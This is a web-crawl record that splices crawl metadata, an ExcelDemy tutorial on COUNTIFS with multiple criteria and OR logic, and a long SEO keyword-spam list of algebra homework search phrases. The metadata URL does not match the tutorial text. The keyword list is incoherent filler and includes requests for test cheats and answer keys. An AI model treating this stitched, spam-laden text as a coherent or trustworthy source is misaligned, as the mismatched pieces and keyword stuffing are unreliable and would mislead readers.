{"ft_lang_label":"__label__en","ft_lang_prob":0.8787424,"math_prob":0.98437804,"size":4264,"snap":"2019-13-2019-22","text_gpt3_token_len":1045,"char_repetition_ratio":0.106807515,"word_repetition_ratio":0.0,"special_character_ratio":0.3008912,"punctuation_ratio":0.12270642,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9829899,"pos_list":[0,1,2],"im_url_duplicate_count":[null,10,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2019-03-19T23:43:42Z\",\"WARC-Record-ID\":\"<urn:uuid:8b025697-c6cb-46fd-8221-2ecbdc9ef93b>\",\"Content-Length\":\"41030\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:c143cd54-0996-4365-9646-0b5218e4b327>\",\"WARC-Concurrent-To\":\"<urn:uuid:c4e37910-8fd7-463d-968a-91d3d1fe85a4>\",\"WARC-IP-Address\":\"5.77.50.192\",\"WARC-Target-URI\":\"http://www.quantopia.net/monte-carlo-in-quant-finance/\",\"WARC-Payload-Digest\":\"sha1:77SNVID6D6UFFZXC6AKAZDRYHWQLB64J\",\"WARC-Block-Digest\":\"sha1:7A7MXNC7SAQTMCDQG62K3CDDHSBVCPQR\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2019/CC-MAIN-2019-13/CC-MAIN-2019-13_segments_1552912202161.73_warc_CC-MAIN-20190319224005-20190320010005-00341.warc.gz\"}"}
https://www.exceldemy.com/countifs-with-multiple-criteria-and-or-logic/
[ "# Excel COUNTIFS with Multiple Criteria and OR Logic (3 Examples)\n\nGet FREE Advanced Excel Exercises with Solutions!\n\nIn this article, we will learn to use the COUNTIFS function with multiple criteria and OR logic in Excel. The COUNTIFS function counts the number of cells that satisfies a set of given conditions or criteria. Today, we will demonstrate 3 ideal examples. Using these examples, you can use the COUNTIFS function with multiple criteria and OR logic. Also, we will show an alternative way to count with multiple criteria. So, without further delay, let’s start the discussion.\n\n## 3 Ideal Examples of Excel COUNTIFS with Multiple Criteria and OR Logic\n\nTo explain the examples, we will use a dataset that contains information about the Payment Status and Quantity of some Products. We will use the COUNTIFS function to count the number of cells based on multiple criteria and OR logic. For example, we want to count the number of laptops and keyboards with pending or paid status. In that case, we can use the following examples. Also, you can apply them to solve your problems easily.", null, "### 1. Use Excel SUM and COUNTIFS Functions with Multiple Criteria and OR Logic\n\nIn the first example, we will use the SUM and COUNTIFS functions with multiple criteria and OR logic. Here, we will count the number of cells that contain a Laptop or Keyboard with the Paid or Pending payment status. In the dataset below, you can see 4 sets of cells that satisfy the conditions.", null, "Let’s follow the steps below to see how we can create a formula to count the number of cells with multiple criteria.\n\nSTEPS:\n\n• First of all, select Cell F13 and type the formula below:\n`=SUM(COUNTIFS(B5:B13,{\"Laptop\",\"Keyboard\"},D5:D13,{\"Paid\";\"Pending\"}))`\n• Secondly, press Enter to see the result.", null, "Here, we have used the SUM and COUNTIFS functions together to get the result. Inside the COUNTIFS function, we have entered the criteria range and criteria.\n\nThe first criteria look for a Laptop or Keyboard in the range B5:B13 and the second criteria looks for Paid or Pending payment status in the range D5:D13.\n\n🔎 How Does the Formula Work?\n\n• COUNTIFS(B5:B13,{“Laptop”,”Keyboard”},D5:D13,{“Paid”;”Pending”}): The output of this part is an array. And that array is {2,0,1,1}. The array can be displayed like the picture below:", null, "It shows that the number of Laptops with the Paid status is 2 and the Pending status is 1. Similarly, the number of Keyboards with Paid status is 0 and the Pending status is 1. So, the total number is 4.\n\n• SUM(COUNTIFS(B5:B13,{“Laptop”,”Keyboard”},D5:D13,{“Paid”;”Pending”})): The SUM function adds up the array {2,0,1,1} and displays the result which is 4.\n\n### 2. Excel COUNTIFS Function with Plus Operator to Count Cells with Multiple Criteria\n\nWe can also use the COUNTIFS function with the Plus (+) operator to count cells with multiple criteria and OR logic. Here, our goal is the same as in the previous example. We will try to count the number of cells that contain the Laptop and Keyboard with Paid or Pending status. For that purpose, we will use a slightly different dataset from the previous one. Here, we have typed the Status in Cell F9 and Cell F10.", null, "Let’s follow the steps below to see how we can implement the formula with the Plus (+) operator.\n\nSTEPS:\n\n• Firstly, select Cell F13 and type the formula below:\n`=COUNTIFS(B5:B13,\\$F\\$6,D5:D13,\\$F\\$9)+COUNTIFS(B5:B13,\\$F\\$6,D5:D13,\\$F\\$10)+COUNTIFS(B5:B13,\\$F\\$7,D5:D13,\\$F\\$9)+COUNTIFS(B5:B13,\\$F\\$7,D5:D13,\\$F\\$10)`\n• After that, press Enter to see the result.", null, "Here, we have used absolute cell reference instead of typing the text inside the formula.\n\n🔎 How Does the Formula Work?\n\nWe can break the formula into four parts and each part counts the cell number specified by the condition.\n\n• COUNTIFS(B5:B13,\\$F\\$6,D5:D13,\\$F\\$9): This is the first part of the formula. It counts the number of cells that contain Keyboard in the range B5:B13 and Pending in the range D5:D13.\n• COUNTIFS(B5:B13,\\$F\\$6,D5:D13,\\$F\\$10): The second part counts the number of cells that contain Keyboard in the range B5:B13 and Paid in the range D5:D13.\n• COUNTIFS(B5:B13,\\$F\\$7,D5:D13,\\$F\\$9): Similarly, the third part counts the number of cells that contain Laptop in the range B5:B13 and Pending in the range D5:D13.\n• COUNTIFS(B5:B13,\\$F\\$7,D5:D13,\\$F\\$10): The last part counts the cell numbers that store Laptop in the range B5:B13 and Paid in the range D5:D13.\n• The Plus (+) operator sums the value and shows the summation.\n\n### 3. Count Cells Using Excel COUNTIFS Formula with OR as well as AND Logic\n\nIn the third example, we will count cells using the COUNTIFS function with OR as well as AND logic. Here, we will count the number of cells that contain a Laptop or Keyboard in the range B5:B13 and payment status Paid in the range D5:D13. For that purpose, we will use the dataset below.", null, "Let’s observe the steps below to see how we can count cell numbers with OR as well as AND logic.\n\nSTEPS:\n\n• In the first place, select Cell F12 and type the formula below:\n`=COUNTIFS(B5:B13,F6:F7,D5:D13,F10)`\n• Now, press Ctrl + Shift + Enter to see the result.", null, "This formula is an array formula. That is why we got an array {0,2} in the result.\n\n• The first condition looks for the text Keyboard or Laptop in the range B5:B13.\n• Similarly, the second condition looks for the word Paid in the range D5:D13.\n• To get the summation of the array {0,2}, you need to use the formula below:\n`=SUM(COUNTIFS(B5:B13,F6:F7,D5:D13,F10))`\n\nIf you insert this formula in Cell F12, then it will show 2 in that cell.\n\n## Alternative to Excel COUNTIFS Function to Count Cells with Multiple Sets of OR Criteria\n\nThe alternative to the COUNTIFS function is to use the SUMPRODUCT function. Inside the SUMPRODUCT function, we will have to use the ISNUMBER function and the MATCH function. To understand the use of the SUMPRODUCT function, we will use the dataset of Example 1. Here, we want to find the count of cells that contain the word Laptop or Keyboard with the payment status Paid or Pending.\n\nTo do so, you need to follow the steps below:\n\nSTEPS:\n\n• In the beginning, select Cell F13 and type the formula below:\n`=SUMPRODUCT(ISNUMBER(MATCH(B5:B13,{\"Laptop\",\"Keyboard\"},0))*ISNUMBER(MATCH(D5:D13,{\"Paid\",\"Pending\"},0)))`\n• After that, press Enter to get the result.", null, "Here, the MATCH function looks for the exact match of the texts in the desired range. After that, the ISNUMBER function checks if the returned value is a number or not. If it is a number, then it returns TRUE, otherwise FALSE. Let’s go through the formula breakdown to learn more.\n\n🔎 How Does the Formula Work?\n\n• MATCH(B5:B13,{“Laptop”,”Keyboard”},0): This part returns the array:\n\n`{#N/A, 2, #N/A, 1, 2, #N/A, 2, 1, 1}`\n\n• ISNUMBER(MATCH(B5:B13,{“Laptop”,”Keyboard”},0)): It checks if the returned array contains a number. The output of this part is:\n\n`{FALSE, TRUE, FALSE, TRUE, TRUE, FALSE, TRUE, TRUE, TRUE}`\n\n• ISNUMBER(MATCH(D5:D13,{“Paid”,”Pending”},0)): Similarly, the output of this part is:\n\n`{TRUE, FALSE, TRUE, TRUE, TRUE, TRUE, FALSE, TRUE, TRUE}`\n\n• ISNUMBER(MATCH(B5:B13,{“Laptop”,”Keyboard”},0))*ISNUMBER(MATCH(D5:D13,{“Paid”,”Pending”},0)): This part multiplies the previous two arrays. So, the result becomes:\n\n`{0, 0, 0, 1, 1, 0, 0, 1, 1}`\n\n• Finally, the SUMPRODUCT function returns the sum of the products of that array which is 4.\n\n## How to Apply COUNTIFS Function with Dynamic OR Logic in Excel\n\nIn the previous sections, we showed the COUNTIFS function with a formula that contained hardcore values. In that case, if you need change, then you have to make change changes inside the formula.\n\nBut we can also use dynamic OR logic inside a formula. For that purpose, we need to define names before applying the formula. Here, we will count the number of cells that contain the text Laptop or Keyboard in the range B5:B13. Let’s follow the steps below to see how to define names in Excel and use it inside the formula.\n\nSTEPS:\n\n• Firstly, select the range F5:F6.", null, "• Secondly, go to the Formulas tab and select Define Name.", null, "• A box will appear.\n• Type a name in the Name field and click OK to proceed.\n• Here, we have named the range F5:F6 as the Product.", null, "• After that, select Cell F13 and type the formula below:\n`=SUM(COUNTIFS(B5:B13,Product))`\n• Press Enter to see the result.", null, "• Finally, if you remove the word Laptop from Cell F6, then the result of Cell F13 will automatically update.", null, "## How to Use COUNTIFS Function with Wildcard Characters in Excel\n\nIn Excel, we can use the Question Mark (?) and Asterisk (*) wildcard characters in the COUNTIFS function. The Question Mark (?) matches a single character and the Asterisk (*) symbol matches a sequence of characters. To demonstrate the wildcard characters, we will use the dataset below. From the dataset, we will count the number of cells with payment status.", null, "Let’s follow the steps below to see how we can use the wildcard characters.\n\nSTEPS:\n\n• First of all, select Cell F11 and type the formula below:\n`=COUNTIFS(B5:B13,\"*\",D5:D13,\"<>\"&\"\")`\n• After that, press Enter to see the result.", null, "This formula matches the sequence of the range B5:B13 & D5:D13 and finds the non-empty cells.\n\n## Related Articles", null, "Mursalin Ibne Salehin\n\nHi there! This is Mursalin. I am currently working as a Team Leader at ExcelDemy. I am always motivated to gather knowledge from different sources and find solutions to problems in easier ways. I manage and help the writers to develop quality content in Excel and VBA-related topics.\n\nWe will be happy to hear your thoughts", null, "Advanced Excel Exercises with Solutions PDF", null, "", null, "" ]
[ null, "data:image/svg+xml,%3Csvg%20xmlns='http://www.w3.org/2000/svg'%20viewBox='0%200%20532%20392'%3E%3C/svg%3E", null, "data:image/svg+xml,%3Csvg%20xmlns='http://www.w3.org/2000/svg'%20viewBox='0%200%20549%20396'%3E%3C/svg%3E", null, "data:image/svg+xml,%3Csvg%20xmlns='http://www.w3.org/2000/svg'%20viewBox='0%200%20580%20455'%3E%3C/svg%3E", null, "data:image/svg+xml,%3Csvg%20xmlns='http://www.w3.org/2000/svg'%20viewBox='0%200%20240%20119'%3E%3C/svg%3E", null, "data:image/svg+xml,%3Csvg%20xmlns='http://www.w3.org/2000/svg'%20viewBox='0%200%20543%20394'%3E%3C/svg%3E", null, "data:image/svg+xml,%3Csvg%20xmlns='http://www.w3.org/2000/svg'%20viewBox='0%200%20576%20490'%3E%3C/svg%3E", null, "data:image/svg+xml,%3Csvg%20xmlns='http://www.w3.org/2000/svg'%20viewBox='0%200%20538%20396'%3E%3C/svg%3E", null, "data:image/svg+xml,%3Csvg%20xmlns='http://www.w3.org/2000/svg'%20viewBox='0%200%20552%20425'%3E%3C/svg%3E", null, "data:image/svg+xml,%3Csvg%20xmlns='http://www.w3.org/2000/svg'%20viewBox='0%200%20701%20453'%3E%3C/svg%3E", null, "data:image/svg+xml,%3Csvg%20xmlns='http://www.w3.org/2000/svg'%20viewBox='0%200%20538%20396'%3E%3C/svg%3E", null, "data:image/svg+xml,%3Csvg%20xmlns='http://www.w3.org/2000/svg'%20viewBox='0%200%20497%20130'%3E%3C/svg%3E", null, "data:image/svg+xml,%3Csvg%20xmlns='http://www.w3.org/2000/svg'%20viewBox='0%200%20320%20239'%3E%3C/svg%3E", null, "data:image/svg+xml,%3Csvg%20xmlns='http://www.w3.org/2000/svg'%20viewBox='0%200%20550%20436'%3E%3C/svg%3E", null, "data:image/svg+xml,%3Csvg%20xmlns='http://www.w3.org/2000/svg'%20viewBox='0%200%20533%20398'%3E%3C/svg%3E", null, "data:image/svg+xml,%3Csvg%20xmlns='http://www.w3.org/2000/svg'%20viewBox='0%200%20533%20398'%3E%3C/svg%3E", null, "data:image/svg+xml,%3Csvg%20xmlns='http://www.w3.org/2000/svg'%20viewBox='0%200%20567%20436'%3E%3C/svg%3E", null, "data:image/svg+xml,%3Csvg%20xmlns='http://www.w3.org/2000/svg'%20viewBox='0%200%2069%2069'%3E%3C/svg%3E", null, "https://www.exceldemy.com/countifs-with-multiple-criteria-and-or-logic/", null, "https://www.exceldemy.com/countifs-with-multiple-criteria-and-or-logic/", null, "data:image/svg+xml,%3Csvg%20xmlns='http://www.w3.org/2000/svg'%20viewBox='0%200%20160%2050'%3E%3C/svg%3E", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.82934266,"math_prob":0.9547804,"size":9816,"snap":"2023-40-2023-50","text_gpt3_token_len":2464,"char_repetition_ratio":0.16123115,"word_repetition_ratio":0.1579272,"special_character_ratio":0.25855747,"punctuation_ratio":0.17117538,"nsfw_num_words":1,"has_unicode_error":false,"math_prob_llama3":0.99169713,"pos_list":[0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40],"im_url_duplicate_count":[null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,2,null,2,null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2023-09-21T10:23:08Z\",\"WARC-Record-ID\":\"<urn:uuid:6468481b-0980-4e9f-97a1-3febbc98642e>\",\"Content-Length\":\"239414\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:06d97fd0-6bb8-4133-942d-f2d5e5f8995d>\",\"WARC-Concurrent-To\":\"<urn:uuid:056dca10-3b3c-4c41-95cf-0dddfdd6b1d5>\",\"WARC-IP-Address\":\"104.21.6.27\",\"WARC-Target-URI\":\"https://www.exceldemy.com/countifs-with-multiple-criteria-and-or-logic/\",\"WARC-Payload-Digest\":\"sha1:LLW2ZPBYKJGATO25GXH5AFSB7HBBAXZE\",\"WARC-Block-Digest\":\"sha1:YX3RQAIBS3IX3DPEA5MMI4DYO5JGAC57\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2023/CC-MAIN-2023-40/CC-MAIN-2023-40_segments_1695233505362.29_warc_CC-MAIN-20230921073711-20230921103711-00880.warc.gz\"}"}
https://softmath.com/math-com-calculator/solving-a-triangle/free-accounting-exercises.html
[ "", null, "Bing visitors came to this page yesterday by entering these keyword phrases :\n\nListing of maths formula, online antiderivative calculator, teach sixth grade algebra, least common multiple solver.\n\nHow to solve algebra 1 problem, +year 10 surd test revision, convert equivalent mixed number to decimal number, worksheets * 3rd grade * description of vertex, learn pre algebra free.\n\nReal life example of hyperbolas, addition+subtraction+Binomial lesson plan, variable exponents, factoring, quadratic function.ppt, mix numbers converting to whole numbers worksheets.\n\n1st grade homework math, numerical test samples with answer key, OHIO 6TH GRADE STATE MATH VOCABULARY WORD SEARCH.\n\nChapter 10 Test teacher Answers Algebra 1 mcdougal Littell, 1st grade math sheets, percent formulas for 7th grade math, art and life in africa booshong, factoring diamond method calculator.\n\nPlace value decimal notation worksheets, find y intercept solver, printable square root worksheets.\n\nCoordinate planes with fractions and decimal, divide fractions, combination/permutation activities, solving addition equations PPT, www.mutiplying fractions.com.\n\nFluid mechanics free tutorial, factoring polynomials with two different variables, solve differential equation matlab, help with algebra problems.\n\nSigns and symbols pages from pocket basics for maths, HOW TO USE GRAPHING CALCULATOR FOR RATIONAL ROOT TEST, scale factor equation, Polynomial Functions Roots Zeros Factors Worksheet, equation for landscape slopes.\n\nAlgebra math formula, algebra 1 worksheet 4-4 answers, rational expressions + add + worksheet, square roots and decimal, 5th and 6th worksheets, calculate the y-intercept grade 9.\n\n\"probabilities\" 7th grade worksheets tricks tools, quadratic equations in real life situations, solving homogeneous equation by substitution.\n\nHelp maths homework year11, middle school math with pizzazz! book d answers, sats paper ks2 free download, algebra practices for 5th grade, calculator program ti 83 solving systems.\n\nLearn basic alegebra, Free Algebra Solving Software Download, long division polynomial solver, domain and range of a linear equation in standard form, free math poems, how do you convert a standard fraction to a decimal fration.\n\nError 13 dimension, graph worksheet 7th grade, parabola and hyperbola equation and solution, multiplying integers worksheet, answers from pearson prentice hall.\n\nMath taks formula chart, Patterns of NTH Terms for even numbers, iowa algebra aptitude practice test, solve hyperbola equation by ti 89, Convert Radicals to decimal, variable is exponent, calculator with positive and negative numbers.\n\nMaximum word problem with parabola and area, Step-by-Step Solution cas, multiply exponential expression, Mcdougal Littell Algebra II book problems, Advanced Algebra 3: extra practice worksheets on conics.\n\nHow to solve Logarithms and their properties, ti-89 polar points, least common denominator for fraction pairs worksheets, free ti emulator, math answers for lcm of polynomials.\n\nHow to find the log base 2 in TI-84 plus, simple algebraic expressions practice sheets, pre-algebra formulas graphs.\n\nTeachers answers to holt mathematics grade 10, simplifying radicals by dividing, solving linear equations worksheets, free Sats test papers for year 6, 4th grade math quadratic equations factoring.\n\nAnswer key mcdougal algebra 2 work, ks3 transformation homework worksheet, Mcdougal Littell Algebra 2 practice workbook answers, prentice hall pre algebra FL edition.\n\nAlgerbra in our daily lives, finding the distance of radicals, greatest common divisor formula, nonhomogeneous differential equations polynomial, College algrebra free downlod for problems, lowest common dinominator calculator, free online equation calculator solvers.\n\nOnline worksheets-radicals, mixedfractionsworksheets, multiplying & dividing monomials math worksheets, translating basic functions intermediate algeba, interpolation trigonometry.\n\nFree pre algebra tests, lowest common multiple calculator, free online TI-84 calculator.\n\nExponent worksheet and fourth grade, online Prentice Hall Mathematics algebra 2 book, free solver matlab, matric calculator, 6th grade math \"combinations\".\n\nAdding and subtracting radicals practice worksheets, dividing polynomials solver, Enter your Synthetic Division problems to instantly get answer, world's hardest math equation, caculator online.\n\nConic online calculator, fun worksheets solving equations using quadratic formula, factorise online, Simplifying Expressions worksheets, answers to all pre algebra chapter 8 practice workbook worksheets, printable grade 10 maths.\n\nGED test questions printable, binomial root calculator, finding roots of an equation on a ti-83, -34 factor expression completely online calculator.\n\nSolve fraction with variable taken to known exponent, compute the integral by completing the square in the exponent, adding and subtracting polynomial equation worksheets, fractions questions yr6.\n\nMathematical balance method in linear equations, grade 7 ordered pairs flash swf, solved problums, algebra with pizzazz! Creative publications answer, free elementary math lesson plans add subtract \"negative integers\".\n\nTeaching equations to k.s.2, faction addition and subtraction java code, worksheets on algebraic fractions, using factoring to solve word problems, how to do modular arithmetic on a TI-83 calculator.\n\nFactoring cubed numbers, equations for 6th grade, adding and subtracting exponents calculator, java prime integer.\n\n3rd degree polynomial calculator online, Algebra Jokes, excel aptitude test, free powerpoints simplifying square roots.\n\n7th grade star prep worksheets, foiling calculator, online simultaneous equation solver, Why do we need 0 on one side of a quadratic equation in order to solve the equation?, statistics permutation combination binom, calculate cubic polynomial root applet, free basic algebra help.\n\nReproducible workbook area, perimeter, volume grade school, locus maths question sheet, java math learning 5th 6th grade, texas ti-92 plus + excel.\n\nAlgebra Equations Solver, quadratic equation given solutions calculator, algebra formulas for percent problems, answers to contemporary abstract algebra, Subtracting signed numbers worksheet, hard math 9th grade, graphing a parabola using a TI-89.\n\nFree algebra II problem solvers, grade 8 print outs for math, reflections math printable free translations middle school.\n\nGrade 9 maths tests, convert pounds into decimals, cube of radical 15, maths for dummies, matlab complex number algebra, online precalc problem solver, polynomials for 7 grade.\n\nALGEBRA EASY, permutations calculator download, combinations, permutations, free worksheets, how to solve polynomials with fractions and factoring, \"greatest common factor\" +worksheet, polynomial factoring calculator, solving equations by substitution with calculators on'line.\n\n24. 4 math worksheet subtracting negative numbers from positive, \"NC EOG\" algebra, algebra II Power Functions homework help, printable 1st grade homework math.\n\nFunctions, statistics, trigonometry answers, math formula in PowerPoint tutorial, free pre algebra integer worksheets, taking the laplace tansform of differential equations, mcgraw hill mathpower 9 pdf download.\n\nFirst grade math algebraic thinking, trigonomic intervals, free 3 rd grade science worksheets.\n\n+ks3 sats revision printables, free elementary math lesson plans - speed or ratio, extracting square root.\n\nTi-89 heaviside step function, order, subtract, multiply worksheet, multiplying rational expressions calculators.\n\nGraphing calculator emulator TI 84, standard form to vertex form, algebra 2 glencoe answers, algebra standard equations using fractions.\n\nMiddle school math with pizzazz teachers answers, teaching special combination permutation, permutation and combination online tutorial, worksheet Simplify rational expressions.\n\nFree solving systems of equations by graphing worksheets, Data Analysis Free printable worksheets, graphing a linear equalities.\n\nMultiple caculator, help with solving 7th grade math problems, Factoring Polynomial Equations for Idiots.\n\nLinear algebra for kids, simplifying exponents & absolute blue, solving second order homogeneous differential equation.\n\nFactoring Trinomials Problem Solver, grade nine basic algebra free worksheets, how to factor out a cubed polynomial.\n\nAlgebra x y graph paper template, 7th grade pre algebra, first order nonhomogeneous partial differential equation, mixed number free worksheet, where can i find a website on math homework awnsers for free?.\n\nEllipse equation solvers, how do you use cubed roots on a calculator?, dividing polynomials graph transformations, printable past year 9 sats papers.\n\nKs3 balancing equations, algebra hungerfod, math answer free now, exponential equation maker, maths algebra (nth term of a square), simplifying factoring, Free Math Answers Problem Solver algebra 2.\n\nGraphing linear equations worksheets, online radical simplifier, how to calculate log on TI 89 calculator?, \"worksheets on angles\", glencoe algebra 2 tutorial, in math what is ladder method?, trigonometry grade 12 sample test.\n\nLongest math formula, how to solve radicals, 6th grade math and reading taks test, hartcourt mathematics 8th grade, multiplying and dividing integers worksheet.\n\nGames for add decimals for 6-8th grade, easy ways algebra story problems, sixth grade math textbook conversion chart, grade 7 work sheet, Solving Equations in more than one step - grade 8 questions.\n\nHolt 6th grade math Integers, solving two degrees linear equation calculator, University of Phoenix Math cheat sheets, dividing polynomials calculator, free algebra and geometry practice worksheets printable, \"english sample test paper\".\n\nUOP Math 116 cheats, MATLAB ode45 for 2nd order ODE, free interactive math games online+8 grader, how to get prentice hall worksheets online.\n\nFree online KS2 sats games, how to solve formulas 3x y x, common denominator calculator, easy steps for factoring and square roots.\n\nSums and differences of radical expression, multiple variable equations, coordinates free worksheets.\n\nIs the college algebra clep online, quadratic formula graph tool, 9th grade sol practice Biology, standard polynomial form online calculator, Glencoe/McGraw-Hill Pre-Algebra answer keys.\n\nExpression simplifyer, graph describe linear & quadratic equations, lesson plans on \"equations of circles\", cube root of a power.\n\nFactor equations software, solve nonlinear ODE, maths problem solver square, graphing non linear inequalities equations, 5th grade algebra free \"Function Tables\" worksheets, answers for mcdougal littell pre-algebra book, square root fractions.\n\nSolving quadratic equations by completing the square calculators, logarithm equation solver, math problem solver-algebra II, ti-89 solving a system of equations, solve zero ti89, algebra simplification practice.\n\nSixth grade inequality lesson plans, linear equation calculator, solve equations in matlab, Simple Probability Worksheets, math solvers, real life absolute value functions, solve basic algebra problem in excel.\n\nProbablity Free Worksheets: possible combinations, cat 5th grade sample, cube root worksheets.\n\nYr 8 maths practise sheets, Scott Foresman MATH Workbook Practice 8-3 answers, maths work sheets for ks2, usable calculator with exponents.\n\nGed writing printout, solving henderson-hasselbach equation on TI89, usable online fraction calculator, square roots and exponents, online Holt math handbook answers.\n\nBase-2 logarithms TI-89, ti-89 and complex number math, factorization and quadratic expressions, converting mixed fractions to decimal, ti-83 plus finding cube root, creative algebra.\n\nLeast Common Denominator calculators, algebraic expression simplifyer, practice solving fractions, practicemath test 5 grademath free online with questions.\n\nSurds worksheet, McDougal Littell Inc. middle school math course 3 chapter 11 test A, Integer practice worksheet, triangle math poem, math practice problem on factors for algebra.\n\nAnswers to pizzazz, grade 2 pie chart worksheets, how to divide add subtract fractions, convert mixed number to a decimal, solution set calculator, polynomial simplifier.\n\nEOCT GA \"practice test\" Algebra, 9th Grade Fraction Worksheets, simplify square root equations, .66 convert decimal into fraction, practice math worksheets 6th grade ASK.\n\nHardest math problem, mult. and divide problems.com, ebook cost accounting, elementary algebra practice problems.\n\nLesson plan on the pyramids=math, implicit differentiation solver, polynomial formula zero of function, algebra free worksheet functions, first grade division picture worksheets, math problems for a pre calculas class, basic algebra solutions.\n\nLeast common multiple of 10 11 12, simplifying equations and exponents, polynomial greatest common divisor online calculator, answers for prentice hall chemistry the physical setting review book, reverse hyperbola graph, like terms solving variable expressions worksheet, factoring algebraic equation.\n\nRadicals and square roots, solve quad eqns, square root rule usable calculator, printable basic algerbra tests, algebra inverse solver, rearranging algebra fraction, solve algebra online.\n\nHow to add algebraic expressions together, Answers of plato pathways algebra 2, Algebra linear combination method, f of x on ti-89.\n\nAlgebra 2 help, algebra test over fractions, distributive property, order of operation, 1st grade online workbooks, free online help foiling with square roots .\n\nLiner systems solver, real life examples of the 12 basic math functions (graphs), 6th grade math taks.\n\n\"middle school\" \"biology worksheets\", Algebra 2 Solver, Holt Ch 9 Review answers chemistry, pearson Addison introductory and intermediate algebra cheat, answers for solving equations by factoring algebra 1 workbook, solve my algebra equation.\n\nTrigonomic calculator cheats, free solved past papers of o levels chemistry, Algebra 2 chapter 9 Resource book; worksheet, dividing Square Root Simplifier, algebra with pizzazz worksheets, online squaring calculator, free printable third grade worksheets.\n\nConceptual physics 9th edition, log base 4 ti-83, scott foresman-addison wesley VA math connection a review and practice workbook, math lessons for grade 8 Algebra tiles, how to do fractions wit exponents.\n\nFree online math test for 7th grade, printable polynomial algebra subtraction with answers, algebra quick answers, Who Discovered Absolute Value, cliff notes combining rational expressions with like denominators, how to order decimals from least to greatest.\n\nSimplifying Rational Expressions calculator, TAKS algebra 1 worksheets, factoring, graphing, quadratic formula, completing the square, algebra: power, \"college algebra\" graphing free, online scientific calculator- log ratio.\n\nQuadratic system in two variable, exam elementary algebra angel 7th edition, general equation of hyperbola, functions, statistics, and trigonometry math book answers, simplify fraction 50/100.\n\nReal Life Application of System of Linear Equation, free online california 9th grade Literature practice star test, UCSMP 7-3 B Properties of Slopes worksheet, printable Square Roots chart.\n\nHow to graph logarithms on the ti-84 plus, Solve addition and subtraction equations practice, prime factorization calculator, matlab solve differential equation.\n\n7th grade math 4-3 worksheet, free math writing a unit rate worksheets, factoring radicals help.\n\nMalaysian year 5 tests math test, solve the equation by completing the squares, Real life exponential function graphing word problem, log2 TI92, ? www.easy science progects.com.\n\nAdding and subtracting radical expressions solver, how to multiply all types of integers, maths worksheets sequences year 8, free pre-algebra with pizzazz! 7th grade, cheat websites for maths for year 9 for rearranging formulas.\n\nStudying for algebra 9th grade, convert from vertex to standard form calculator, percent and proportion powerpoint, comparing fractions with common denominators or numerators worksheet.\n\nMathematic, agebra difference of two square, factoring cubed roots, fraction least common multipler worksheets, how does the absolute value -7 compare with the absolute value of 7?, what is the formula for solving binomials.\n\n3d trigonometry worksheet, how is the binomial factor theorem used in calculating probability?, McGraw online texbooks MathGrade 5, cost accounting saxena ebook free, algebra and functions first grade, parbola formula, how to get the square root of 5 to one decimal palce.\n\nAlgebra II free worksheets, re arranging equation in matlab, subtracting fractions calculator common denominator, exam mathsquiz, pattern generalization 4th grade, Ellipse equation solver for free.\n\nHow to add simultaneous equation in ti 89, undetermined coefficients to find quadratic equation, fun trigonmetry for fourth graders, ti89 cheat, McDougal Littell Chapter 11 Test C answers, matlab polynom roots finding trouble.\n\nDividing worksheets, calculator used for solving square root problems, solving second order ordinary differential equations, free math brain teaser worksheets.\n\nReal life math dialation, maths worksheets work with time KS3, thrid grade free printable algebra math worksheets, solving third degree equation in Matlab.\n\nDecimal to fraction formula, 10th root on a on ti-83, \"solve my algebra\" \"least common denominator\" simplify, cost accounting free book, matlab solve, adding and subtracting positive and negative numbers car.\n\nHolt pre algebra math book formula sheet, checking logs ti 83, online graphing calculator for rational functions, solve rational equations online, T89 root( function 3rd root.\n\nInteger tutorial for sixth grade, online calculator square route, \"how to find x intercept\" function, Preparing Iowa Algebra Aptitude Test, kumon sheets.\n\nConvert decimals to fractions calculator free download, read 1 to 100 numbers and sum that numbers using java, how to solve simultaneous non linear equations, holt mathematics workbook pre algebra.\n\nSolve algebra problems, Math Book glencoe answers, represent log base 2 on TI 86.\n\nAlgebra Structure and Method Book 1 worksheets, algebra 1 lessons refresh me, ti 89 how to store formulas, elipse example problem, algebra one prentice hall california edition math problems, free ebooks on mathematics (quadratic Equations).\n\nIntro algebra percent of change, equation inverse finder, grade 5 math converting fractions to decimals step by step, translation worksheet free pdf, mixed numbers to decimals calculator, equation factoring solver, poem prime numbers.\n\nRatio to fraction calculator, Free Online English past papers, step by step simplification of radical expressions, examples of easy ways to learn inequalities.\n\nHomework pre algebra, how to cheat using plato algebra, add and subtract integers worksheet, solve a logarithmic equation with square roots.\n\nGraphing equations ppt grade 4, functional operations math problems, Fractions Turned into Decimals calculator, how to factor out cubed polynomials, year 9 algebra questions.\n\nFree presentation on differentiation and intergration, trig answers, hyperbola solver.\n\nSample cat/6 6th grade, hard factoring polynomials worksheets, Holt Pre-Algebra scale models.\n\nMath problem solver grade 2, Prentice Hall practice workbook answers, solving rational square roots, how to do change of base with TI-83 calculator logarithms, free 8th grade worksheets, surface area of prisms exercices.\n\nAlgebra worksheet ks2, integers printable worksheets, pdf ti-89, math worksheets from the virginia edition of the mathbook.\n\n\"Who invented Slope\", graphing linear equations for parents, glencoe algebra 2 chapter test, o-level mathematics quiz, math equation simplifier, free GED math review.\n\nPrentice hall mathematics pre algebra answers, algebra 2 step equations worksheets, mathmatic equasion.\n\nTi ROM code, simplifying worksheets practice worksheets, conversion table for linear and sqaure footage, teaching equations to 4th grade, adding and subtracting positive and negative numbers worksheet, 7th grade math problems worksheets, pearson prentice hall pre algebra answers free.\n\nMix integer worksheet pdf, combination and permutation source code in vb, free printable fifth grade worksheets.\n\nRoots and exponents, HARDEST QUESTION ALGEBRA, algebra for dummy, how to 